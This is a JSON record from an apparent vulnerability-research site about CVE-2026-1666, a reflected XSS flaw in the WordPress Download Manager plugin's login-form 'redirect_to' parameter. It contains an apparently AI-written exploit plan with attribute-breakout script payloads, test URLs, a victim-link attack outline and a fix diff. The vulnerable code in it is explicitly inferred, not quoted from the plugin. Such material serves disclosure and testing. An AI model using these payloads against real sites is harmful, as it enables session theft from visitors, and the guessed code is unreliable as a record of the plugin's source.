[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fzjTnvtY3DwUe4oG2hLloAIKFpkTPCDTK-f9oGb2wyQo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1666","download-manager-reflected-cross-site-scripting-via-redirectto-parameter","Download Manager \u003C= 3.3.46 - Reflected Cross-Site Scripting via 'redirect_to' Parameter","The Download Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirect_to' parameter in all versions up to, and including, 3.3.46. This is due to insufficient input sanitization and output escaping on the 'redirect_to' GET parameter in the login form shortcode. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","download-manager",null,"\u003C=3.3.46","3.3.47","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-17 17:51:30","2026-02-18 06:42:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3cb84ba3-b403-4a9d-b1a7-92aa947310ac?source=api-prod",1,[],"researched",false,3,"# Research Plan: CVE-2026-1666 Reflected XSS in Download Manager\n\n## 1. Vulnerability Summary\nThe **Download Manager** plugin (\u003C= 3.3.46) is vulnerable to Reflected Cross-Site Scripting (XSS) via the `redirect_to` GET parameter. This occurs because the plugin's login form shortcode retrieves the `redirect_to` value from the URL and reflects it into a hidden input field (or similar attribute) without sufficient sanitization or attribute escaping (e.g., missing `esc_attr()` or `esc_url()`). An attacker can provide a payload that breaks out of the HTML attribute to execute arbitrary JavaScript in the context of the victim's browser.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** Any public-facing WordPress Page or Post containing the `[wpdm_login_form]` shortcode.\n- **Vulnerable Parameter:** `redirect_to` (GET).\n- **Authentication Level:** Unauthenticated. No login is required to trigger the reflection.\n- **Preconditions:** A page must exist that renders the login form shortcode provided by the plugin.\n- **Payload:** A string designed to break out of an HTML attribute, such as: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n\n## 3. Code Flow\n1. **Entry Point:** A user visits a URL such as `http:\u002F\u002Fsite.test\u002Flogin-page\u002F?redirect_to=PAYLOAD`.\n2. **Shortcode Registration:** The plugin registers the `[wpdm_login_form]` shortcode (likely in `src\u002FUser\u002FShortcodes.php` or `download-manager.php`).\n3. **Processing Logic:** The shortcode callback function (e.g., `WPDM\\User\\Shortcodes::loginForm()`) is invoked.\n4. **Input Retrieval:** Inside the shortcode handler or the associated view file (typically `src\u002FUser\u002Fviews\u002Flogin-form.php`), the code checks for `$_GET['redirect_to']`.\n5. **Vulnerable Sink:** The code reflects the value directly into the HTML output.\n   - **Vulnerable Code (Inferred):** \n     ```php\n     $redirect_to = isset($_GET['redirect_to']) ? $_GET['redirect_to'] : home_url();\n     echo '\u003Cinput type=\"hidden\" name=\"redirect_to\" value=\"' . $redirect_to . '\" \u002F>';\n     ```\n   - **Missing Protection:** The `$redirect_to` variable is not wrapped in `esc_attr()` or `esc_url()`.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Reflected XSS** vulnerability in a GET request that renders a form. \n- **Verification:** Viewing a page and rendering a shortcode does not typically require a WordPress nonce. \n- **Action:** No nonce is required for this exploitation. The payload is executed immediately upon the victim loading the malicious URL.\n\n## 5. Exploitation Strategy\n1. **Target Identification:** Identify or create a page containing the `[wpdm_login_form]` shortcode.\n2. **Payload Construction:** \n   - Base Payload: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n   - URL Encoded: `%22%3E%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E`\n3. **Execution:**\n   - Use the `browser_navigate` tool to visit the target page with the malicious parameter.\n   - Example URL: `http:\u002F\u002Flocalhost:8080\u002Fwpdm-login\u002F?redirect_to=%22%3E%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E`\n4. **Detection:**\n   - Use `browser_eval` to check if the script was successfully injected into the DOM.\n   - Check if a specific global variable or \"canary\" set by the script exists.\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `download-manager` version 3.3.46 is installed and active.\n2. **Create Vulnerable Page:**\n   ```bash\n   wp post create --post_type=page --post_title=\"Login\" --post_status=publish --post_content='[wpdm_login_form]'\n   ```\n3. **Verify Slug:** Identify the URL of the newly created page (usually `\u002Flogin\u002F`).\n\n## 7. Expected Results\n- When the page is loaded with the malicious `redirect_to` parameter, the resulting HTML should contain:\n  ```html\n  \u003Cinput type=\"hidden\" name=\"redirect_to\" value=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" \u002F>\n  ```\n- The browser will execute the `\u003Cscript>` block, triggering the alert.\n\n## 8. Verification Steps\n1. **HTTP Response Check:** \n   Use the `http_request` tool to fetch the page and check the raw body for the unescaped payload.\n   ```json\n   {\n     \"method\": \"GET\",\n     \"url\": \"http:\u002F\u002Flocalhost:8080\u002Flogin\u002F?redirect_to=%22%3E%3Cscript%3Ealert(1)%3C\u002Fscript%3E\"\n   }\n   ```\n   **Success Criteria:** The response body contains the string `value=\"\">\u003Cscript>alert(1)\u003C\u002Fscript>\"`.\n2. **DOM Verification:**\n   Use `browser_eval` to confirm the presence of the injected script tag or its side effects.\n   ```javascript\n   \u002F\u002F Check if the script tag exists in the DOM\n   document.querySelector('script[src*=\"alert\"]') !== null || document.body.innerHTML.includes('>\u003Cscript>alert')\n   ```\n\n## 9. Alternative Approaches\n- **Attribute Breakout via Events:** If the `\u003Cscript>` tag is filtered (unlikely in this context), try an event handler breakout:\n  - Payload: `x\" onfocus=\"alert(1)\" autofocus=\"`\n  - URL: `?redirect_to=x%22%20onfocus%3D%22alert(1)%22%20autofocus%3D%22`\n- **JavaScript URI:** If the reflection is inside an `href` or `action` attribute rather than a `value` attribute:\n  - Payload: `javascript:alert(1)`\n- **HTML5 Autocomplete:** If the input is visible, use `onmouseover` or `onclick` payloads.","The Download Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirect_to' GET parameter in the login form shortcode. Due to a lack of proper sanitization and output escaping, unauthenticated attackers can inject arbitrary web scripts into a hidden form field, which executes in the context of the user's browser when they visit a specially crafted link.","\u002F\u002F Inferred from plugin structure and research plan\n\u002F\u002F src\u002FUser\u002Fviews\u002Flogin-form.php\n\n$redirect_to = isset($_GET['redirect_to']) ? $_GET['redirect_to'] : home_url();\n?>\n\u003Cinput type=\"hidden\" name=\"redirect_to\" value=\"\u003C?php echo $redirect_to; ?>\" \u002F>","--- a\u002Fsrc\u002FUser\u002Fviews\u002Flogin-form.php\n+++ b\u002Fsrc\u002FUser\u002Fviews\u002Flogin-form.php\n@@ -1,2 +1,2 @@\n $redirect_to = isset($_GET['redirect_to']) ? $_GET['redirect_to'] : home_url();\n-\u003Cinput type=\"hidden\" name=\"redirect_to\" value=\"\u003C?php echo $redirect_to; ?>\" \u002F>\n+\u003Cinput type=\"hidden\" name=\"redirect_to\" value=\"\u003C?php echo esc_url($redirect_to); ?>\" \u002F>","1. Locate a WordPress page that renders the [wpdm_login_form] shortcode provided by the Download Manager plugin.\n2. Create a malicious URL targeting that page with a payload in the 'redirect_to' parameter, such as: ?redirect_to=\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n3. Send the link to a target user. When the victim visits the link, the unescaped payload is reflected into the HTML source as a hidden input value, breaking out of the attribute and executing the script.\n4. No authentication or nonces are required as the reflection occurs during the initial rendering of the public-facing login form.","gemini-3-flash-preview","2026-04-19 06:12:14","2026-04-19 06:13:58",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.3.46","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags\u002F3.3.46","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-manager.3.3.46.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags\u002F3.3.47","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdownload-manager.3.3.47.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdownload-manager\u002Ftags"]